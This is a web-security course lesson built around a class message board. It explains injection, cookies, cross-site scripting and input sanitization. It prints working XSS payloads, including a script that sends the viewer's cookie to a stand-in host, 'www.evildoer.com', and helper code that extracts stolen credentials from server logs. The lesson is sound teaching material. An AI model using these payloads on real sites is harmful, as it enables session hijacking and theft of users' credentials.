Anatomy of our simple message board

Now that you've seen how forms and server-side scripts work, you have all the tools you need to understand how the simple message board we've been using in class works. That matters because most non-trivial websites have the same basic architecture, just not in anywhere near so simple a form.

The user goes to http://rona.cs.usna.edu/~smith/msg/mb.html and enters "Hello World!".

mb.html as rendered by browser:

Message Board

mb.html HTML code:

<html><body> <h1>Message Board</h1> <hr> <form action="mb.cgi"> <input type="text" name="msg"> <input type="button" onclick="submit()" value="post message"> </form> </body></html>

The user presses the post message button and the browser sends the server a "GET" request with URL
```
http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Hello+World!
```
The server executes the script mb.cgi with input Hello World!. The script modifies the file mb.html by inserting
```
<b>smith</b>: Hello World!
```
into the body of the HTML code. In other words, your message is inserted literally character-by-character, prefaced by your username (in bold).
The server then sends the browser simple HTML code that redirects it back to mb.html (i.e. document.location = http://rona.cs.usna.edu/~smith/msg/mb.html).

The browser displays the new version of mb.html.

mb.html as rendered by browser:

Message Board

smith: Hello World!

mb.html HTML code:

<html><body> 
<h1>Message Board</h1> 
<hr>
<b>smith</b>: Hello World!<br>
    <form action="mb.cgi"> <input type="text" name="msg"> 
      <input type="button" onclick="submit()" value="post message"> 
    </form> 
</body></html>

The one big difference between our simple message board and more sophisticated systems is that their server scripts send the user data they receive to a database (a system for storing and retrieving data) rather than directly changing files on the server. When the web server for such a site serves up pages to browsers, what's in the page depends on the information in the database.

It's important to understand this architecture for the following discussions, but it's also important because big complex sites fit the same basic pattern: The user enters data into a form on their browser, submitting the form sends data to the server, which executes a script that processes that data. The script actually changes files on the server, so that the next time a browser requests one of those files, the content received by the browser has changed.
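
To make that pattern concrete, here is a rough sketch in Javascript of the kind of work a script like mb.cgi has to do. It is not the actual mb.cgi code, which we haven't shown: the function name handlePost, its parameters, and the choice to insert each post just before the form are all assumptions made for illustration.

```javascript
// Hypothetical sketch, not the real mb.cgi.
// pageHtml:    current contents of mb.html
// username:    who is posting (assumed to be known from the login)
// queryString: the part of the URL after the "?", e.g. "msg=Hello+World!"
function handlePost(pageHtml, username, queryString) {
  // URLSearchParams undoes the URL encoding, so "Hello+World!" becomes "Hello World!".
  var msg = new URLSearchParams(queryString).get("msg");
  if (msg === null) msg = "";

  // The message goes in literally, character-for-character, after the bold username.
  var post = "<b>" + username + "</b>: " + msg + "<br>\n";

  // Assumption: new posts are placed just before the form.
  var formStart = pageHtml.indexOf("<form");
  if (formStart === -1) formStart = pageHtml.length;
  return pageHtml.slice(0, formStart) + post + pageHtml.slice(formStart);
}

var oldPage = '<html><body> <h1>Message Board</h1> <hr>\n' +
              '<form action="mb.cgi"> <input type="text" name="msg"> </form>\n' +
              '</body></html>';
var newPage = handlePost(oldPage, "smith", "msg=Hello+World!");
console.log(newPage);
```

Notice that nothing in this sketch looks at what the message contains before putting it into the page.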

Injection attacks

Since the message board includes whatever text we enter into the box literally, i.e. character-for-character, we can add a little spice to our posting. For example, if I (as user smith) post the message

I <u>hate</u> waking up early!

to the board, the result will be that anyone viewing the message board sees

I hate waking up early!

I could, for example, post an image by entering something like this:

Check out this picture <img src="http://social-context.org/wp-content/uploads/2011/08/skeptical-cat-is-fraught-with-skepticism1.jpg">

And you can post links, and other things as well. I could even post a script! Suppose I posted the following "message":

<script type="text/javascript">var i = 0; while (i < 100) { document.write("GO NAVY! "); i = i + 1; }</script>

Injection Attack on a US Navy Site

Hackers hit a U.S. Navy website used to help sailors and their families relocate to a new station. The site was vulnerable to an SQL injection attack, which enabled the attacker to gain login information for the site, including usernames, passwords, and email addresses.

Sometimes data sent in HTML forms is processed by a server that manages a computer database. If the form input data is not sanitized, a malicious user may be able to trick the database server into revealing some or all of its data by injecting database commands into the form. The language used to interact with databases is called Structured Query Language (SQL), which is why this type of attack is known as an SQL injection attack.

As a result of the attack, the targeted site was immediately shut down, and a few weeks later it was permanently retired.

When that script is included in the message board, character-for-character, the result is that a browser rendering the page will insert 100 "GO NAVY!"s at the point of my message. Cute, right? The problem is, this opens the door to allowing message board users to wreak havoc upon the poor little website. What if I put 1000000000 instead of 100 in the above "message"? What if I put while (1 == 1) in the above code rather than while (i < 100)? What if I posted

<script type="text/javascript">document.location="http://www.usma.edu";</script>

on the message board? All of these examples show that it is easy to take down the message board, i.e. render it totally inaccessible to anyone, by injecting code into the data that gets sent to the server. This kind of attack is called an injection attack for that very reason, and is a general kind of attack. In fact, we already saw an example of an injection attack when we tricked the guess-a-number game and were able to win in one guess every time. We'll look at several examples of how we can use injection attacks to do more subtle and devious things than just disable the page, and then we'll look at how we can protect a website like the message board against injection attacks.

Authentication and cookies

The message board is set up so that anyone may view it, but you can only post to it with a message board account. Moreover, everything you post is prefaced with your username, so we know who posts what. Authentication — verifying that you are who you say you are — is critical to providing security both in cyberspace and out. We'll discuss authentication in more detail later in the course, but authentication by username and password is something you should all be familiar with.

The obvious way (not the best way!) to do password protection is to have the usernames and passwords stored on the server, and have the user supply them when he asks for protected pages. But what if the whole site is supposed to be protected? One way is to have you provide your username and password every time your browser makes a GET request to the webserver. This is clearly too much of a pain in the neck for us users! Next simplest plan for password-authenticated websites: have your web-browser save your username and password on your machine, so that it can retrieve them and send them automatically with every request it makes to that webserver. That's how the message board works.

A better plan than storing the username and password in a cookie is to store a session key - a random number that serves as username and password for this session only. The session key gets stored locally as a cookie and is sent with every request to the server. This protects the actual password, so that someone who hijacks one session can't do it again.

Because neither the browser nor the user is likely to know how different webservers are going to work in this regard, the system is set up so that the server tells the browser what to store; the browser doesn't decide on its own.
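
Here is a minimal sketch of how a server might hand out and check session keys. It is not how the message board works (it stores the username and password themselves). The names sessions, newSessionKey, logIn, whoIs and logOut, the 16-byte key length, and the plain-text password table are all assumptions chosen to keep the example short.

```javascript
// Hypothetical sketch of session keys. Nothing here is the message board's real code.
// Use the built-in Web Crypto random source (browsers and newer Node.js),
// falling back to Node's crypto module where the global is missing.
var webcrypto = globalThis.crypto || require("crypto").webcrypto;

// Server-side table: session key -> username.
var sessions = new Map();

// Make a random, hard-to-guess key: 16 random bytes written as 32 hex digits.
function newSessionKey() {
  var bytes = new Uint8Array(16);
  webcrypto.getRandomValues(bytes);
  return Array.from(bytes, function (b) {
    return b.toString(16).padStart(2, "0");
  }).join("");
}

// Check the password once; on success, return a key for the browser to keep as a cookie.
// passwordTable is a simplification: it maps usernames to plain-text passwords.
function logIn(username, password, passwordTable) {
  if (passwordTable[username] !== password) return null;
  var key = newSessionKey();
  sessions.set(key, username);
  return key;
}

// On later requests, the cookie holds only the key, never the password.
function whoIs(sessionKey) {
  return sessions.has(sessionKey) ? sessions.get(sessionKey) : null;
}

// Ending the session makes a stolen key useless.
function logOut(sessionKey) {
  sessions.delete(sessionKey);
}
```

With this design, a thief who sees the cookie gets only a key that stops working once the session ends, not the password itself.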

The name for locally (i.e. on the browser's machine) stored information associated with a particular website is "cookie". Be aware that these are on your machine and could be misused by bad people. You can disable cookies in your browser, but then all sorts of sites won't work. (Yet another functionality vs. security trade-off!) You can also wipe the browser's cookie memory periodically.

IE10 to have "Do Not Track" enabled by default
Privacy is related to security, but not quite the same. Web browsing has tons of privacy implications, and not good ones. Web-sites and third-party businesses do a whole bunch of "tracking" of online behavior, and they are often able to put together a fairly comprehensive picture of your online activities. Think about that! Cookies and Javascript play a big role in doing that kind of thing. A new standard called "Do Not Track" proposes an extension to HTTP that allows browsers to send a "do not track" request within a regular GET. It only amounts to asking politely, but many well-known websites have pledged to honor these requests. Firefox, Safari and Opera allow users to turn "do not track" on, but it's not the default. Microsoft made big news this summer by announcing that "do not track" would be enabled by default in IE10, the next release of Internet Explorer.

The cookie for a page with URL X gets sent with every request to a page in the subtree rooted at X's directory. That way you don't have to reenter username and password for each page in a site. Cookies are sent in the HTTP traffic as part of the "GET" request, but not in the URL, simply as additional HTTP info. This is what an HTTP "GET" request with cookies looks like.
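
As a rough illustration, the following Javascript builds the text of such a request and applies the "same directory subtree" rule described above. The function names are made up for this sketch, the rule is simplified compared to what real browsers do, and a real request carries more header lines than the three shown here.

```javascript
// Hypothetical helpers for illustration only.

// Directory part of a URL path: "/~smith/msg/mb.html" -> "/~smith/msg/"
function directoryOf(path) {
  return path.slice(0, path.lastIndexOf("/") + 1);
}

// Simplified rule: the cookie set for cookiePagePath is sent with any request
// whose path lies in the same directory subtree.
function cookieApplies(cookiePagePath, requestPath) {
  return requestPath.startsWith(directoryOf(cookiePagePath));
}

// Assemble the text of a GET request. The cookie rides along as its own
// header line, separate from the URL on the first line.
function buildGetRequest(host, path, cookie) {
  var lines = ["GET " + path + " HTTP/1.1", "Host: " + host];
  if (cookie) lines.push("Cookie: " + cookie);
  return lines.join("\r\n") + "\r\n\r\n";
}

var cookie = "uname=m16YYYY&pswd=foo";
var path = "/~smith/msg/mb.cgi?msg=Hello+World!";
if (cookieApplies("/~smith/msg/mb.html", path)) {
  console.log(buildGetRequest("rona.cs.usna.edu", path, cookie));
}
```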

Reflection

Javascript code can access the cookie for the current page with the variable document.cookie. Thus, the code alert(document.cookie) inserted into the message board by any one user will cause everyone who looks at the page to see their own cookie, because the cookie you see depends on who's viewing the page, not who posted the code. It's like a mirror, in a way.

This point is really important, so let's be concrete with an example. Suppose we have users m16XXXX, m16YYYY and m16ZZZZ with passwords rab, foo and bar respectively. User m16XXXX posts

<script type="text/javascript">alert(document.cookie);</script>

to the message board. Now that script is embedded in the message board, i.e. it is client-side script that will be executed by the browser of anyone visiting the message board. Next suppose user m16YYYY visits the message board. Her browser executes the script code put there by m16XXXX and up pops an alert box that says:

	  uname=m16YYYY&pswd=foo

... because her browser has her cookies. Next suppose user m16ZZZZ visits the message board. His browser executes the script code put there by m16XXXX and up pops an alert box that says:

	  uname=m16ZZZZ&pswd=bar

... because his browser has his cookies.
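
The same idea can be imitated outside a browser. In this small sketch the function postedScript stands in for the code m16XXXX posted, and the two objects are made-up stand-ins for what each viewer's browser holds. None of these names come from the message board itself.

```javascript
// Stand-in for the posted script: it reports the cookie of whatever
// document it happens to be running in.
function postedScript(viewerDocument) {
  return viewerDocument.cookie;
}

// Hypothetical stand-ins for each viewer's browser state.
var browserOfYYYY = { cookie: "uname=m16YYYY&pswd=foo" };
var browserOfZZZZ = { cookie: "uname=m16ZZZZ&pswd=bar" };

// One piece of code, two different results, depending only on who runs it.
console.log(postedScript(browserOfYYYY));
console.log(postedScript(browserOfZZZZ));
```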

Cross Site Scripting (XSS)

If we combine injection and reflection we get an example of what's called a cross site scripting (XSS) attack. Let's look at an example using the message board. Suppose we have message board users m16YYYY and m16ZZZZ with passwords foo and bar respectively. An evildoer, Midn m16XXXX perhaps, creates a webpage with the following script embedded in it:

<script type="text/javascript">document.location="http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Die+Bart+die!";</script>

If he can trick m16YYYY into visiting his webpage, and she happens to have logged into Prof. Smith's message board page already during that browser session, then here's what happens:

Midn m16YYYY's browser executes the script on the evildoer's webpage
The script causes the browser to send a "GET /~smith/msg/mb.cgi?msg=Die+Bart+die!" request to the server rona.cs.usna.edu. Since m16YYYY has a cookie for that page (from having logged in previously), her cookie, containing her username and password, gets sent to the server rona.cs.usna.edu.
The server rona.cs.usna.edu receives the GET request with m16YYYY's username and password, and so inserts the message "Die Bart die!" prefaced with m16YYYY's username.

So now there is a message board post from m16YYYY threatening this poor Bart person. Of course m16YYYY didn't cause the post to happen, the evildoer m16XXXX did that. But there's no way to tell that fact from the perspective of the message board and the message board webserver rona.cs.usna.edu. The GET request that caused the message to be posted was sent from m16YYYY's browser with her username and password, just as if she'd typed it in the message board webpage herself.

The essence of this kind of attack is that the evildoer sets things up so that the victim's browser executes a script, and that means the script runs with the credentials (username/password in this case) of the victim. It might not seem that serious when we're just attacking the message board. However, what if we did a similar thing with a bank account rather than a message board, and instead of posting a threat, the code we sent caused funds to be transferred?

Teach a man to phish ...
Phishing is very common. In fact, even though your e-mail account has spam filters that try to detect phishing e-mails and block them from appearing in your inbox, you're very likely to see one now and then. Check out The SI110 SPAM Page for some examples of SPAM that's made it into USNA inboxes.

Email and XSS, Phishing and Spear Phishing

The big problem for the evildoer in the previous example is how to get the victim to visit the webpage he's created that contains the script. One way is through an e-mail that contains a link to the evildoer's website.

A Phishing approach is to send out a blanket e-mail to a large number of people hoping that, out of all of them, someone will click on the link and happen to be logged in to the message board at the time. You try to make the e-mail enticing or make it look legitimate, but your real hope is that out of enough people you'll find that someone.

A Spear Phishing approach is to identify one or a small number of targets, do some research on them (e.g. check Facebook, Twitter, company websites, etc.), and craft an e-mail based on that knowledge that they're especially likely to accept as legitimate, so that they're likely to click on the link to the evildoer's website.

Of course if an e-mail client (i.e. a program for reading e-mail) runs scripts embedded in HTML-formatted e-mail, we don't need the victim to click on anything: we could simply embed a script in the e-mail that sets document.location to the evildoer's website. In that case, merely opening the e-mail would send you to the site. For this reason, most e-mail clients refuse to run Javascript embedded in an e-mail. Hopefully you now see why!

An effective attack on the message board

In class, along with the other attacks above, your instructor (acting as the evildoer) ran a really effective attack on the message board. It went something like this:

The evildoer has his own webserver at www.evildoer.com

The evildoer posts to the message board a message like this:

Here's a nice picture: <script type="text/javascript">document.write('<img src="http://www.evildoer.com/kitten.jpg?' + document.cookie + '">');</script>

The innocent Midshipman m16YYYY (password foo) logs into the message board and pulls it up. In rendering the message board, m16YYYY's browser executes the code in the script, which inserts the img element:
```
<img src="http://www.evildoer.com/kitten.jpg?uname=m16YYYY&passwd=foo">
```
... into the body of the message board's HTML code.
Midshipman m16YYYY's browser sends the request to www.evildoer.com to GET the file /kitten.jpg?uname=m16YYYY&passwd=foo
The evildoer's webserver receives this GET request and, like all GET requests to the server, it gets saved in the webserver logs. The evildoer's website will still send back a nice picture of a kitten, but the damage will have been done.
Finally, the evildoer checks his webserver logs and finds
```
GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1
```
and, lo and behold, he has m16YYYY's username and password!

This attack is quite mean, because from m16YYYY's perspective, nothing seems to be wrong. She saw a nice picture of a kitten, and that's all. No hint that now the evildoer has her username and password.
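
The two ends of this attack amount to simple string handling, which the sketch below imitates. The function names are invented for illustration, and the log line is the one from the steps above. Real webserver logs have more fields on each line.

```javascript
// What the injected script effectively builds in the victim's browser:
// an img element whose URL carries the victim's cookie after the "?".
function injectedImgTag(cookie) {
  return '<img src="http://www.evildoer.com/kitten.jpg?' + cookie + '">';
}

// What the evildoer does later: pull the cookie back out of a log line
// of the form "GET <path>?<cookie> HTTP/1.1".
function cookieFromLogLine(line) {
  var url = line.split(" ")[1];          // "/kitten.jpg?uname=...&passwd=..."
  var q = url.indexOf("?");
  return q === -1 ? "" : url.slice(q + 1);
}

console.log(injectedImgTag("uname=m16YYYY&passwd=foo"));
console.log(cookieFromLogLine("GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1"));
```

The point to take away is that any data a script can read can be smuggled out inside an ordinary-looking request.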

Protecting against injection attacks: sanitizing input

We've seen a lot of nasty things in this lesson (and even in some previous lessons) that can be done with injection attacks. It's time to ask: what can we do about it? How can we protect ourselves? Fundamentally, we can't just take input from a user (in this case the "message" they want to post) and stick it into our message board. Instead, we have to sanitize the input. That means removing or rendering harmless anything that might cause trouble. Sanitizing input is a huge issue in practice, precisely because the risk of injection attack is so high.

Here's the sledgehammer approach to sanitizing our message board input: You can't have any HTML or embedded Javascript code without < and >, so if we escaped those characters before putting the message into the message board, nobody could do an injection attack. There are a variety of ways to escape them, but since their ASCII values are 60 and 62, the following works: replace < with &#60; and > with &#62;. Here's a little bit of Javascript code that does it. Assuming you have a variable msg that has the original message, this creates variable newmsg that has the same string except that all the <'s have been replaced with &#60;'s, and all the >'s have been replaced with &#62;'s.

Consequences of poor input validation.
Validating input is always crucial and, in fact, security is just one example of why. There are lots of instances of poor input validation causing serious problems without any malicious attacker being involved.

1999 NASA: The $328 million Mars Climate Orbiter was sent into the Mars atmosphere on the wrong trajectory, causing it to disintegrate. The cause: one piece of software assumed it received input in metric units (newton-sec), but was sent data in English units (pounds-sec).

2001 Multidata Systems: Cancer treatment software calculated radiation dose based on a user-input configuration of lead shielding blocks. Calculations assumed no more than four shielding blocks were used, but the software allowed data for five blocks to be entered. The result: Cobalt-60 gamma radiation overdosing, an unknown number of deaths, and three radiation physicists charged with second-degree murder.

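// Build newmsg from msg one character at a time, escaping < and >.
var newmsg = "";
var count = 0;
while (count < msg.length)
{
  var nextChar = msg[count];
  if (nextChar == "<")
    newmsg = newmsg + "&#60;";   // numeric character reference for <
  else if (nextChar == ">")
    newmsg = newmsg + "&#62;";   // numeric character reference for >
  else
    newmsg = newmsg + nextChar;  // every other character is copied unchanged
  count = count + 1;
}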

Now, would this code be run on the client or on the server? Hopefully by now you realize that it must run on the server, because a bad person could contrive to send the HTTP GET request to the server without going through the client-side validation (just as we saw with server side scripts in the last lesson).
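
To see the effect, here is the same replacement packaged as a function and applied to one of the attack messages from earlier. The function name sanitize is just a label chosen for this sketch, and it uses the built-in string replace rather than a loop. The idea is unchanged.

```javascript
// Same sledgehammer idea: every < becomes &#60; and every > becomes &#62;.
function sanitize(msg) {
  return msg.replace(/</g, "&#60;").replace(/>/g, "&#62;");
}

var attack = '<script type="text/javascript">document.location="http://www.usma.edu";</script>';
console.log(sanitize(attack));
```

The sanitized message contains no < or > at all, so a browser displays it as plain text instead of running it.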

The above approach does secure us from injection attack, but that security comes at a cost. We can no longer use any HTML in our message board postings. That means no posting pictures, no using italics and bold face, and no links. The real trick is to sanitize the input in such a way that we're safe from the bad stuff, but users can still have the power and flexibility to post things like pictures, links, etc. It's a difficult job, however. One of the things you should have walked away from the programming part of the course appreciating is that it's hard to write a program that anticipates all the kinds of inputs that a dumb, sloppy or malicious user might throw at you.
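
One possible direction, offered only as a sketch, is to escape everything first and then put back a short list of tags we've decided are harmless. The function name and the choice of allowed tags (b, i and u, with no attributes) are assumptions for illustration. This handles neither pictures nor links, and a careless user can still leave a tag unclosed and mess up the page's formatting.

```javascript
// Hypothetical allow-list sanitizer: bold, italic and underline survive,
// everything else is shown as plain text.
function sanitizeAllowingBasicTags(msg) {
  // Step 1: escape every < and >, exactly as in the sledgehammer approach.
  var escaped = msg.replace(/</g, "&#60;").replace(/>/g, "&#62;");

  // Step 2: restore only the exact tags <b>, </b>, <i>, </i>, <u>, </u>.
  // A tag with anything extra inside (like an onclick attribute) does not
  // match the pattern, so it stays escaped.
  return escaped.replace(/&#60;(\/?)(b|i|u)&#62;/g, "<$1$2>");
}

console.log(sanitizeAllowingBasicTags("I <u>hate</u> waking up early!"));
console.log(sanitizeAllowingBasicTags("<script>alert(document.cookie);</script>"));
```

Starting from "allow nothing" and adding back specific safe things is usually easier to get right than trying to list every dangerous thing a user might type.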

Summary of injection attacks and cross-site scripting

(Read this)